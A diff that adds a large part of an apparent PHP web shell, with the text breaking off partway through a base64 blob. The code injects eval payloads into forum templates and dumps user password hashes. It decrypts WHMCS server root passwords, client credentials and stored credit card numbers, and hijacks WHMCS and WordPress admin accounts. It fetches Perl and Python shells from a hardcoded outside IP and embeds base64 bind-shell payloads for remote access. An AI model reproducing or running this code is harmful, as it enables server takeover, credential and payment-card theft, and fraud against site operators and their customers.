+$crypt  = "{\${eval(base64_decode(\'";
+$crypt .= "$shell";
+$crypt .= "\'))}}{\${exit()}}</textarea>";
+
+
+
+
+if ($ch == 'faq'){$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'";}
+
+elseif ($ch == 'cal'){$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='CALENDAR'";}
+
+elseif ($ch == 'sea'){$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='search_forums'";}
+
+
+$query =@ mysql_query($sqlfaq);
+
+if ($query)
+{
+  echo "<br /><br /><center><br /><div style=\"color: #003300;  font-weight: bold\">Injection has been successfully</div>  </center>";
+  echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+  exit;
+}
+else if (!$query)
+{
+  echo "<br /><br /><center><br /><div style=\"color: #003300;  font-weight: bold\">Injection has been erorr !</div>  </center>";
+  echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+  exit;
+
+}
+
+
+}
+
+
+
+
+
+
+
+
+
+}
+else if ($op == 'shm')
+{
+
+
+
+
+
+$sql = 'select * from `user`';
+$query =@ mysql_query($sql);
+
+if ($query)
+{
+
+while ($row = mysql_fetch_assoc($query))
+{
+
+echo "
+<br /><br /><table cellpadding='4' cellspacing='4' align='center' class='tbm'>
+<tr>
+       <td>ID :</td>
+       <td>user :</td>
+       <td>pass :</td>
+       <td>salt :</td>
+       <td>email :</td>
+
+</tr>
+
+<tr>
+       <td>".$row['userid']."</td>
+       <td>".$row['username']."</td>
+       <td>".$row['password']."</td>
+        <td>".$row['salt']."</td>
+        <td>".$row['email']."</td>
+</tr>
+
+</table>
+
+  ";
+
+
+
+
+
+ }}
+
+}
+else if ($op == 'out')
+{
+
+setcookie( "host_mysql", $host,time()-3600);
+setcookie( "user_mysql", $user,time()-3600);
+setcookie( "pass_mysql", $pass,time()-3600);
+setcookie( "db_mysql", $db,time()-3600);
+ob_end_flush();
+
+
+echo " <meta http-equiv=\"refresh\" content=\"0; url=$pg?sws=ms\" /> ";
+exit;
+
+
+
+}
+
+///////////////////////////////// whmcs ////////////////////////////////////////
+
+
+else if ($op == 'hroot')
+{
+
+
+
+
+
+
+if (isset($_POST['viw']))
+{
+
+$hash = $_POST['hash'] ;
+
+
+$query = mysql_query("SELECT * FROM tblservers");
+
+        echo "<div class='tmp'><table cellpadding='5' align='center'>
+        hosting roots
+        <tr><td>Type</td><td>noc</td><td>Active</td><td>IP Address</td><td>username</td><td>Password</td></tr>";
+
+        while($row = mysql_fetch_array($query)) {
+
+        echo "<tr>
+        <td>{$row['type']}</td><td>{$row['noc']}</td><td>{$row['active']}</td><td>{$row['ipaddress']}</td><td>{$row['username']}</td><td>".decrypt($row['password'], $hash)."</td>
+
+        </tr>";
+        }
+        echo "</table>";
+
+
+        $query = mysql_query("SELECT * FROM tblhosting where username = 'root' or 'admin' or 'administrator'");
+         echo "<table cellpadding='5' align='center'>
+         <br /><br />
+         Clients roots
+        <tr><td>IP Address</td><td>username</td><td>Password</td></tr>";
+
+        while($row = mysql_fetch_array($query)) {
+
+        echo "<tr>
+        <td>{$row['dedicatedip']}</td><td>{$row['username']}</td><td>".decrypt($row['password'], $hash)."</td>
+
+        </tr>";
+        }
+        echo "</table></div>";
+        echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+        exit;
+
+
+}
+else
+{
+
+echo'<form method="post">
+ <br /><br />
+encryption hash <br /><br /><input type="text" name="hash" /><br /><br />
+<input type="submit" name="viw" value="show"  />
+
+</form>';
+exit;
+
+
+
+
+
+}
+
+
+}
+
+
+//////////// domine ////////////
+
+ else if ($op == 'scard')
+
+{
+
+if (isset($_POST['viw']))
+{
+
+$hash = $_POST['hash'] ;
+
+
+$query = mysql_query('select * from `tblclients`') ;
+echo "<div class='tmp'><table cellpadding='5' align='center'> ";
+while($v = mysql_fetch_array($query)) {
+  echo "
+  <tr><td>cardtype</td>
+  <td>id</td>
+  <td>firstname</td>
+  <td>lastname</td>
+  <td>email</td>
+  <td>city</td>
+  <td>ciuntry</td>
+  <td>address1</td>
+  <td>lastlogin</td>
+  <td>phonenumber</td>
+  <td>datecreated</td>
+  <td>cardnum</td>
+  <td>startdate</td>
+  <td>expdate</td>
+  </tr>";
+    echo "<tr>
+
+    <td>{$v['cardtype']}</td>
+    <td>{$v['id']}</td>
+    <td>{$v['firstname']}</td>
+    <td>{$v['lastname']}</td>
+    <td>{$v['email']}</td>
+    <td>{$v['city']}</td>
+    <td>{$v['ciuntry']}</td>
+    <td>{$v['address1']}</td>
+    <td>{$v['lastlogin']}</td>
+    <td>{$v['phonenumber']}</td>
+    <td>{$v['datecreated']}</td>
+    <td>".decrypt ($v['cardnum'], $hash)."</td>
+    <td>".decrypt ($v['startdate'], $hash)."</td>
+    <td>".decrypt ($v['expdate'], $hash)."</td>
+     </tr></div></table>";
+     echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+     exit;
+
+ }
+}else
+{
+
+echo'<form method="post">
+ <br /><br />
+encryption hash <br /><br /><input type="text" name="hash" /><br /><br />
+<input type="submit" name="viw" value="show"  />
+
+</form>';
+exit;
+
+
+
+
+
+}
+
+
+
+
+
+
+
+}
+
+ else if ($op == 'chost')
+
+{
+
+
+
+if (isset($_POST['viw']))
+{
+
+$hash = $_POST['hash'] ;
+
+$query = mysql_query("SELECT * FROM tblhosting");
+    echo "<div class='tmp'><table cellpadding='5' align='center'>
+    <tr><td>domain</td><td>Username</td><td>Pass</td><td>IP Address</td></tr>";
+    while($r = mysql_fetch_array($query)) {
+    echo "<tr><td>{$r['domain']}</td><td>{$r['username']}</td>
+    <td>".decrypt ($r['password'], $hash)."</td><td>{$r['dedicatedip']}</td></tr>";
+    }
+    echo "</table></div>";
+   echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+
+    exit;
+
+
+
+}
+else
+{
+
+echo'<form method="post">
+ <br /><br />
+encryption hash <br /><br /><input type="text" name="hash" /><br /><br />
+<input type="submit" name="viw" value="show"  />
+
+</form>';
+exit;
+
+
+
+
+
+}
+
+
+
+
+
+
+
+}
+
+
+
+else if ($op == 'cadmin')
+
+{
+
+
+
+if (isset($_POST['viw']))
+{
+
+$pass = md5($_POST['pass']);
+$user = $_POST['user'];
+
+
+
+$query =@mysql_query("UPDATE `tbladmins` SET `username` ='".$user."' WHERE ID = 1");
+$query =@mysql_query("UPDATE `tbladmins` SET `password` ='".$pass."' WHERE ID = 1");
+
+if ($query)
+{
+  echo "<center><br /><div style=\"color: #003300;  font-weight: bold\">Updated admin successfully </div>  </center>";
+          echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+
+  exit;
+}
+
+else if (!$query)
+{
+  echo "<center><br /><div style=\"color: red;  font-weight: bold\">Updated admin erorr </div>  </center>";
+          echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+
+  exit;
+
+}
+
+
+
+
+
+
+
+}
+else
+{
+
+echo'<form method="post">
+ <br /><br />
+user : <input type="text" name="user" /><br /><br />
+pass : <input type="text" name="pass" /><br /><br />
+<input type="submit" name="viw" value="update"  />
+
+</form>';
+
+
+exit;
+
+
+
+
+
+}
+}
+
+
+
+else if ($op == 'trak')
+
+{
+
+$page = $_GET['page'];
+$numpr = 30;
+if(!$page){$page = 0;}
+$sql0 = mysql_query("Select * from tbltickets");
+$num_r0s = mysql_num_rows($sql0);
+
+
+$sql = mysql_query("Select * from tbltickets order by id desc limit $page,$numpr");
+
+$ap = 1;
+echo "<br /><br /><div>Page  : ";
+for ($s = 0 ; $s < $num_r0s; $s = $s+$numpr )
+{
+
+if ($page != $s) { echo "<a class='hr' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
+else {echo "<a class='hr2' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
+
+
+$ap ++;
+
+}
+
+echo "</div><br />";
+
+
+while ($r3o = mysql_fetch_assoc($sql))
+{
+
+$email   = $r3o['email'];
+$date    = $r3o['date'];
+$title   = $r3o['title'];
+$message = $r3o['message'];
+echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
+
+echo "<tr><td>email : $email </td><td>date : $date </td><td>title : $title</td></tr>
+<tr > <td>message</td> <td colspan='3'>$message</td><br /><br /></tr>";
+echo "</table></div>";
+echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+exit;
+
+
+
+}
+
+}
+
+
+else if ($op == 'rtrak')
+
+{
+
+$page = $_GET['page'];
+$numpr = 25;
+if(!$page){$page = 0;}
+$sql0 = mysql_query("Select * from tblticketreplies");
+$num_r0s = mysql_num_rows($sql0);
+
+
+$sql = mysql_query("Select * from tblticketreplies order by id desc limit $page,$numpr");
+
+$ap = 1;
+echo "<br /><br /><div>Page  : ";
+for ($s = 0 ; $s < $num_r0s; $s = $s+$numpr )
+{
+
+if ($page != $s) { echo "<a class='hr' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
+else {echo "<a class='hr2' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
+
+
+$ap ++;
+
+}
+
+echo "</div><br />";
+
+
+while ($r3o = mysql_fetch_assoc($sql))
+{
+
+$email   = $r3o['email'];
+$date    = $r3o['date'];
+$message = $r3o['message'];
+echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
+
+echo "<tr><td>email : $email </td><td>date : $date </td></tr>
+<tr > <td>message</td> <td colspan='2'>$message</td><br /><br /></tr>";
+echo "</table></div>";
+echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+exit;
+
+
+
+}
+
+}
+
+
+/////////////////////////////////// backup //////////////////////////
+
+else if ($op == 'bkup')
+{
+
+
+
+
+
+
+if (isset($_POST['viw']))
+{
+
+
+
+$path = $_POST['path'];
+
+$domp = @backup_tables($path,$host_c,$user_c,$pass_c,$db_c);
+
+
+  echo "<center><br /><div style=\"color: #003300;  font-weight: bold\">Create backup successfully <br /><br /> $path</div>  </center>";
+  echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+  exit;
+
+
+
+
+
+
+}
+else
+{
+
+echo'<form method="post">
+ <br /><br />
+path backup <br /><br /><input type="text" name="path" /><br /><br />
+<input type="submit" name="viw" value="Create"  />
+
+</form>';
+exit;
+
+
+
+
+
+}
+
+
+}
+
+
+
+
+
+ else if ($op == 'sh3')
+
+{
+
+if (isset($_POST['viw']))
+{
+
+$string = $_POST['string'];
+$ch = $_POST['ch'];
+
+if ($ch == 'trs')
+{
+   $sql4 = @mysql_query("Select * from tblticketreplies WHERE `message` LIKE '%$string%'");
+
+}
+
+else if($ch == 'tr')
+  {
+   $sql4 = @mysql_query("Select * from tbltickets WHERE `message` LIKE '%$string%'  ");
+  }
+
+
+
+
+$nu0 = @mysql_num_rows($sql4);
+if ($nu0 == 0){echo "No result"; exit;}
+
+while ($r33o = mysql_fetch_assoc($sql4))
+{
+
+
+$date    = $r33o['date'];
+$title   = $r33o['title'];
+$message = $r33o['message'];
+echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
+
+echo "<tr><td>email : $email </td><td>date : $date </td><td>title : $title</td></tr>
+<tr > <td>message</td> <td colspan='3'>$message</td><br /><br /></tr>";
+echo "</table></div>";
+exit;
+
+
+
+}
+
+
+
+
+
+}
+else
+{
+
+echo'<form method="post">
+ <br /><br />
+search : <input type="text" name="string" />&nbsp;&nbsp;<select name="ch">
+<option value="tr">ticket</option>
+<option value="trs">ticket replies</option>
+</select> <br /><br />
+<input type="submit" name="viw" value="search"  />
+
+</form>';
+exit;
+
+
+
+
+
+}
+}
+
+
+
+
+else if ($op == 'sh3')
+
+{
+
+if (isset($_POST['viw']))
+{
+
+$string = $_POST['string'];
+$ch = $_POST['ch'];
+
+if ($ch == 'trs')
+{
+   $sql4 = @mysql_query("Select * from tblticketreplies WHERE `message` LIKE '%$string%'");
+
+}
+
+else if($ch == 'tr')
+  {
+   $sql4 = @mysql_query("Select * from tbltickets WHERE `message` LIKE '%$string%'  ");
+  }
+
+
+
+
+$nu0 = @mysql_num_rows($sql4);
+if ($nu0 == 0){echo "No result"; exit;}
+
+while ($r33o = @mysql_fetch_assoc($sql4))
+{
+
+
+$date    = $r33o['date'];
+$title   = $r33o['title'];
+$message = $r33o['message'];
+echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
+
+echo "<tr><td>email : $email </td><td>date : $date </td><td>title : $title</td></tr>
+<tr > <td>message</td> <td colspan='3'>$message</td><br /><br /></tr>";
+echo "</table></div>";
+
+
+
+
+}
+
+
+
+
+
+}
+else
+{
+
+echo'<form method="post">
+ <br /><br />
+search : <input type="text" name="string" />&nbsp;&nbsp;<select name="ch">
+<option value="tr">ticket</option>
+<option value="trs">ticket replies</option>
+</select> <br /><br />
+<input type="submit" name="viw" value="search"  />
+
+</form>';
+
+exit;
+
+
+
+
+}
+}
+
+
+else if ($op == 'css')
+
+{
+
+if (isset($_POST['viw']))
+{
+   $index = $_POST['index'];
+   $seh = $_POST['string'];
+   $rs = search($seh);
+    if(count($rs) == 0){echo 'No result';exit;}
+    foreach ($rs as $info)
+    {
+
+   $table = $info['table'];
+   $column = $info['column'];
+
+   echo "table :  $table<br /><br />
+
+   column : $column
+   <form method=\"post\">
+ <br /><br />
+<input type='submit' name='v' value=\"inject\"  />
+            <input type='hidden' name=\"index\" value=$index>
+            <input type=\"hidden\" name=\"table\" value='$table'>
+            <input type=\"hidden\" name=\"column\" value='$column' >
+            <input type=\"hidden\" name=\"shearc\" value='$seh'>
+</form>
+";
+
+exit;
+
+
+
+
+
+
+
+    }
+
+
+
+
+
+
+
+}
+else
+{
+
+echo'<form method="post">
+ <br /><br />
+search : <input type="text" name="string" />
+<br />
+Css url : <input type="text" name="index"><br /><br />
+<input type="submit" name="viw" value="search"  />
+
+</form>';
+exit;
+
+
+
+
+
+}
+
+   if (isset($_POST['v']))
+   {
+
+   $seh = $_POST['shearc'] ;
+   $table = $_POST['table'];
+   $column = $_POST['column'] ;
+   $rlcss = $_POST['index'] ;
+
+     $data = "<head><link href=$rlcss rel=stylesheet></head>";
+
+    $query = mysql_query("UPDATE ".$table." SET ".$column." ='$data' WHERE `$column` LIKE '%$seh%'") or die(mysql_error());
+    if($query){
+        echo "<center><br /><div style=\"color: #003300;  font-weight: bold\">Injection has been successfully</div>  </center>";
+        echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+        exit;
+    }else{
+        echo '<center><br /><div style=\"color: #003300;  font-weight: bold\"> Injection erorr</div>';
+
+
+        exit;
+    }
+
+
+   }
+
+
+}
+
+
+else if ($op == 'awp')
+
+{
+
+
+
+if (isset($_POST['viw']))
+{
+
+$pass = $_POST['pass'];
+$user = $_POST['user'];
+
+
+$crypt = crypt($pass);
+
+$query =@mysql_query("UPDATE `wp_users` SET `user_login` ='".$user."' WHERE ID = 1") or die;
+$query =@mysql_query("UPDATE `wp_users` SET `user_pass` ='".$crypt."' WHERE ID = 1") or die;
+
+if ($query)
+{
+  echo "<center><br /><div style=\"color: #003300;  font-weight: bold\">Updated admin successfully </div>  </center>";
+  echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+  exit;
+}
+else if (!$query)
+{
+  echo "<center><br /><div style=\"color: red;  font-weight: bold\">Updated admin erorr </div>  </center>";
+  echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+  exit;
+
+}
+
+
+
+
+
+
+
+}
+else
+{
+
+echo'<form method="post">
+ <br /><br />
+user : <input type="text" name="user" /><br /><br />
+pass : <input type="text" name="pass" /><br /><br />
+<input type="submit" name="viw" value="update"  />
+
+</form>';
+
+
+
+
+
+}
+}
+
+
+else if ($op == 'shwp')
+{
+
+
+
+
+
+$sql = 'select * from `wp_users`';
+$query =@ mysql_query($sql);
+
+if ($query)
+{
+
+while ($row = mysql_fetch_assoc($query))
+{
+
+echo "
+<br /><br /><table cellpadding='4' cellspacing='4' align='center' class='tbm'>
+<tr>
+       <td>ID :</td>
+       <td>user :</td>
+       <td>pass :</td>
+       <td>email :</td>
+
+</tr>
+
+
+<tr>
+       <td>".$row['ID']."</td>
+       <td>".$row['user_login']."</td>
+       <td>".$row['user_pass']."</td>
+        <td>".$row['user_email']."</td>
+</tr>
+
+
+
+</table>
+
+
+  ";
+
+  echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+  exit;
+
+
+
+
+
+ }}
+
+}
+
+
+
+}
+
+break;
+
+
+
+/////////////////////////////////////////////// info   ///////////////////////////////////
+case 'info':
+
+$sws = 'al-swisre' ;
+if ($sws != 'al-swisre'){echo "Coded by al-swisre"; exit;}
+
+if(strlen($dir)>1 && $dir[1]==":")
+$os = "Windows";
+else $os = "Linux";
+$read = @file_get_contents("http://s92443018.onlinehome.us/cgi-bin/host.php?$ips");
+$r3ad = @file_get_contents("http://aruljohn.com/track.pl?host=$ips") ;
+$ipnet = @findit($read,"<td nowrap>IP-Network</td><td>&nbsp;</td><td nowrap>","</td>");
+$ipb = @findit($read,"<td nowrap>IP-Network-Block</td><td>&nbsp;</td><td nowrap>","</td>");
+$hostname = @findit($read,"Hostname:","<br>");
+$isp = @findit($r3ad,"ISP</td><td>","</td>");
+
+
+
+
+
+
+echo "<div class='info'><table cellpadding='0' align='center' width='60%' >
+<tr><td colspan='2'>Information Server</td><tr>
+<tr><td>Hostname</td><td>".$hostname."</td></tr>
+<tr><td>ISP</td><td>".$isp."</td></tr>
+<tr><td>IP-Network</td><td>".$ipnet."</td></tr>
+<tr><td>IP-Network-Block</td><td>".$ipb."</td></tr>
+<tr><td>Safe Mode</td><td>".(($safe_mode)?(" &nbsp;: <b><font color=red>ON</font></b>"):("<b><font color=green>OFF</font></b>"))."</td></tr>
+<tr><td>System</td><td>".$os."</td></tr>
+<tr><td>PHP Version </td><td>".phpversion()."</td></tr>
+<tr><td>Zend Version </td><td>".@zend_version()."</td></tr>
+<tr><td>Magic_Quotes </td><td>". magicQouts()."</td></tr>
+<tr><td>Curl </td><td>".Curl()."</td></tr>
+<tr><td>Register Globals </td><td>".RegisterGlobals()."</td></tr>
+<tr><td>Open Basedir </td><td>".openBaseDir()."</td></tr>
+<tr><td>Gzip </td><td>".Gzip()."</td></tr>
+<tr><td>Free Space </td><td>".HardSize(disk_free_space('/'))."</td></tr>
+<tr><td>Total Space </td><td>".HardSize(disk_total_space("/"))."</td></tr>
+<tr><td>MySQL</td><td>".MySQL2()."</td></tr>
+<tr><td>MsSQL</td><td>".MsSQL()." </td></tr>
+<tr><td>PostgreSQL</td><td>".PostgreSQL()."</td> </tr>
+<tr><td>Oracle</td><td>".Oracle()."</td></tr>";
+
+exit;
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+break;
+
+
+///////////////////////////////// bypass ///////////////////////
+
+case 'byp':
+
+
+echo '<div class="cont3">
+[ <a href="?sws=byp"> bypass </a>]
+
+[<a href="?sws=byp&op=shell&sh=perl">Make Shell Perl</a>]
+
+[<a href="?sws=byp&op=shell&sh=py"> Make Shell Python </a>]
+[<a href="?sws=byp&op=g3t"> Get file </a>]
+
+</div><br /><br />'  ;
+
+$op = $_GET['op'];
+
+if(@$_GET['dir']){
+    $dir = $_GET['dir'];
+    if($dir != 'nullz') $dir = @cleandir($dir);
+}
+
+if ($op == 'shell')
+{
+
+
+$sh = $_GET['sh'];
+////////////////////////// perl or python //////////////////////
+
+if (!isset($_POST['get']))
+{
+
+
+
+echo "<form method='post'>
+Path shell : <input type='text' name='path'  value='".$dir."/cgi-bin' size='30'/><br /><br />
+name shell : <input type='text' name='name'  value='shell.sa' size='25' /><br /><br />
+htaccess   :<br /><br /><textarea name='htx'>AddHandler cgi-script .sa</textarea>
+<br /><br />
+<input type='submit' name='get' value='Make' /></form>";
+
+}else {
+
+
+$path = $_POST['path'];
+$name = $_POST['name'];
+$htac = $_POST['htx'];
+
+if (isset($htac))
+{
+
+$fop = @fopen("$path/.htaccess", 'w');
+
+@fwrite($fop,$htac);
+
+@fclose($fop);
+
+}
+
+$rpath = $path."/".$name;
+
+
+if ($sh == 'perl')
+{
+    $url_shell  = 'http://64.15.137.117/~google/cgi-bin/perl.zip';   /// perl
+    $path = $dir."/".$d3r."/"."sa.pl";
+
+}
+else if($sh == 'py')
+
+{
+
+    $url_shell  = 'http://64.15.137.117/~google/cgi-bin/python.zip';  /// python
+    $path = $dir."/".$d3r."/"."sa.py";
+
+
+}
+
+//// get shell///
+
+
+    $fp = @fopen($rpath, 'w');
+
+    $ch = @curl_init($url_shell);
+    @curl_setopt($ch, CURLOPT_FILE, $fp);
+
+    $data = @curl_exec($ch);
+
+    @curl_close($ch);
+    @fclose($fp);
+
+
+
+if (!is_file($rpath))
+{
+
+
+
+    $ch = @curl_init($url_shell);
+    @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+
+    $data = @curl_exec($ch);
+
+    @curl_close($ch);
+
+    @file_put_contents($rpath, $data);
+
+}elseif (@is_file($rpath)) {
+
+$ch =@chmod($rpath,0755);
+
+echo "Sh3ll have been created<br /><br />
+$rpath";
+
+
+
+}else {echo "error";}
+
+}
+}
+///////////////////// get file ////////////////////
+elseif ($op == 'g3t')
+{
+
+if (!isset($_POST['get']))
+{
+
+
+echo 'Get file<br /><br /><br />
+<form method="post">
+Url file : <input type="text" name="file" />&nbsp;&nbsp;
+to : <input type="text" name="path" value="'.$dir.'/file.php"  /><br /><br />
+<input type="submit" name="get" value="Get" />
+
+</form>' ;exit;
+
+
+
+
+
+
+
+}
+else
+{
+
+$url_shell = $_POST['file'];
+$path = $_POST['path'];
+
+
+
+    $fp = @fopen($path, 'w');
+
+    $ch = @curl_init($url_shell);
+    @curl_setopt($ch, CURLOPT_FILE, $fp);
+
+    $data = @curl_exec($ch);
+
+    @curl_close($ch);
+    @fclose($fp);
+
+
+
+if (!is_file($path))
+{
+
+
+
+    $ch = @curl_init($url_shell);
+    @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+
+    $data = @curl_exec($ch);
+
+    @curl_close($ch);
+
+    @file_put_contents($path, $data);
+
+}elseif (@is_file($path)) {
+
+
+echo "got the file successfully<br /><br />
+$path"; exit;
+
+
+
+}else {echo "error";}
+
+
+
+}
+
+
+
+
+
+}else if(!isset($op)) {}
+
+
+
+
+
+
+
+break;
+
+/////////////////////////////////////////////////// Connect Back ////////////////////////////////////
+
+case 'con':
+
+
+
+if (!isset($_POST['con']))
+{
+echo "";
+
+echo "
+<div class='conn'><table cellpadding='0' align='center'>
+<br />
+<form method=\"post\">
+<tr><td>
+<br />Back Connect :<br /> <br />
+Ip : <input type=\"text\" name=\"ip\" value='". $_SERVER['REMOTE_ADDR'] ."' />&nbsp;&nbsp;&nbsp;
+Port : <input type=\"text\" name=\"port\" />&nbsp;&nbsp;&nbsp;
+<select name=\"op\">
+<option value=\"php\">PHP</option>
+<option value=\"perl\">Perl</option>
+<option value=\"python\">Python</option>
+</select>&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"con\" value=\"Connect\" /><br /> <br /><br /></td></tr>
+<tr><td><br />Bind Connect :<br /><br />Port : <input type=\"text\" name=\"bind_port\" /> <select name=\"op\">
+<option value=\"perl\">Perl</option>
+<option value=\"python\">Python</option>
+</select>
+<input type=\"submit\" name=\"con\" value=\"Connect bind\" /> <br /><br /> <br /></td></tr>
+
+
+</form>";
+
+exit;
+
+}else
+{
+
+if ($_POST['con'] == 'Connect') {
+
+
+
+$ip = $_POST['ip'] ;
+$port = $_POST['port'] ;
+$op = $_POST['op'] ;
+
+$bind_perl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
+$bind_py = "IyBTZXJ2ZXIgIA0KIA0KaW1wb3J0IHN5cyAgDQppbXBvcnQgc29ja2V0ICANCmltcG9ydCBvcyAgDQoNCmhvc3QgPSAnJzsgIA0KU0laRSA9IDUxMjsgIA0KDQp0cnkgOiAgDQogICAgIHBvcnQgPSBzeXMuYXJndlsxXTsgIA0KDQpleGNlcHQgOiAgDQogICAgIHBvcnQgPSAzMTMzNzsgIA0KIA0KdHJ5IDogIA0KICAgICBzb2NrZmQgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICwgc29ja2V0LlNPQ0tfU1RSRUFNKTsgIA0KDQpleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCg0KICAgICBwcmludCAiRXJyb3IgaW4gY3JlYXRpbmcgc29ja2V0IDogIixlIDsgIA0KICAgICBzeXMuZXhpdCgxKTsgICANCg0Kc29ja2ZkLnNldHNvY2tvcHQoc29ja2V0LlNPTF9TT0NLRVQgLCBzb2NrZXQuU09fUkVVU0VBRERSICwgMSk7ICANCg0KdHJ5IDogIA0KICAgICBzb2NrZmQuYmluZCgoaG9zdCxwb3J0KSk7ICANCg0KZXhjZXB0IHNvY2tldC5lcnJvciAsIGUgOiAgICAgICAgDQogICAgIHByaW50ICJFcnJvciBpbiBCaW5kaW5nIDogIixlOyANCiAgICAgc3lzLmV4aXQoMSk7ICANCiANCnByaW50KCJcblxuPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KcHJpbnQoIi0tLS0tLS0tIFNlcnZlciBMaXN0ZW5pbmcgb24gUG9ydCAlZCAtLS0tLS0tLS0tLS0tLSIgJSBwb3J0KTsgIA0KcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PVxuXG4iKTsgDQogDQp0cnkgOiAgDQogICAgIHdoaWxlIDEgOiAjIGxpc3RlbiBmb3IgY29ubmVjdGlvbnMgIA0KICAgICAgICAgc29ja2ZkLmxpc3RlbigxKTsgIA0KICAgICAgICAgY2xpZW50c29jayAsIGNsaWVudGFkZHIgPSBzb2NrZmQuYWNjZXB0KCk7ICANCiAgICAgICAgIHByaW50KCJcblxuR290IENvbm5lY3Rpb24gZnJvbSAiICsgc3RyKGNsaWVudGFkZHIpKTsgIA0KICAgICAgICAgd2hpbGUgMSA6ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIGNtZCA9IGNsaWVudHNvY2sucmVjdihTSVpFKTsgIA0KICAgICAgICAgICAgIGV4Y2VwdCA6ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICBwaXBlID0gb3MucG9wZW4oY21kKTsgIA0KICAgICAgICAgICAgIHJhd091dHB1dCA9IHBpcGUucmVhZGxpbmVzKCk7ICANCiANCiAgICAgICAgICAgICBwcmludChjbWQpOyAgDQogICAgICAgICAgIA0KICAgICAgICAgICAgIGlmIGNtZCA9PSAnZzJnJzogIyBjbG9zZSB0aGUgY29ubmVjdGlvbiBhbmQgbW92ZSBvbiBmb3Igb3RoZXJzICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tLS0tLS0tLS0iKTsgIA0KICAgICAgICAgICAgICAgICBjbGllbnRzb2NrLnNodXRkb3duKCk7ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIG91dHB1dCA9ICIiOyAgDQogICAgICAgICAgICAgICAgICMgUGFyc2UgdGhlIG91dHB1dCBmcm9tIGxpc3QgdG8gc3RyaW5nICANCiAgICAgICAgICAgICAgICAgZm9yIGRhdGEgaW4gcmF3T3V0cHV0IDogIA0KICAgICAgICAgICAgICAgICAgICAgIG91dHB1dCA9IG91dHB1dCtkYXRhOyAgDQogICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgIGNsaWVudHNvY2suc2VuZCgiQ29tbWFuZCBPdXRwdXQgOi0gXG4iK291dHB1dCsiXHJcbiIpOyAgDQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICBleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCiAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tIik7ICANCiAgICAgICAgICAgICAgICAgY2xpZW50c29jay5jbG9zZSgpOyAgDQogIC